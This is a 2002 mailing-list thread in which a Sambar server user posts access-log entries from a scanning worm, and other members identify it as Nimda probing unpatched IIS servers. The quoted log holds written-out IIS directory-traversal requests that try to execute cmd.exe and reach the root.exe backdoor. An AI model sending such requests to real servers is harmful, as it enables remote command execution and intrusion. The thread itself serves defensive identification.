If anyone needs the file, Dave, I have IIs Running, and I have the "Healing"
File for anyone that needs it. Just email me, it is only a few Kbytes, and
can be easily emailed.....
Kim
----- Original Message -----
From: "Dave Culbertson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, May 11, 2002 8:02 AM
Subject: [sambar] Access log entries {03}
> Thanks, Hank Tony and Alex. I was aware that it was no harm to Sambar and
since I don't run IIs, no worries here. However, I have tracked down one of
the offending servers and wanted to contact them with informed information.
That's why I needed the name of the virus on their server.
>
> Dave Culbertson
>
> On 11/May/2002 10:51:22, Tony Mallen wrote:
> > Nimda virus from unpatched microft servers.But its getting a 404 error
so should be okay.
> >
> > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > Does anyone recognize what kind of virus or bot would cause the
following access log entries?
> > >
> > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET
/scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET
/scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET
/scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET
/scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > >
> > > I am being accessed by quite a few computers with the same or simular
entries and would like to know the name of what this is. Thanks.
> > >
> > > Dave Culbertson
> > >
> > > -------------------------------------------------------
> > > To unsubscribe please go to <A TARGET="_blank"
HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > >
> > >
> > >
> > >
> > >
> > >
> >
> >
> >
> >
> >
> >
> > -------------------------------------------------------
> > To unsubscribe please go to <A TARGET="_blank"
HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> >
> >
> >
> >
> >
> >
> >
> >
>
> -------------------------------------------------------
> To unsubscribe please go to http://www.sambar.ch/list/
>
>
>
>
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.361 / Virus Database: 199 - Release Date: 5/7/02
-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
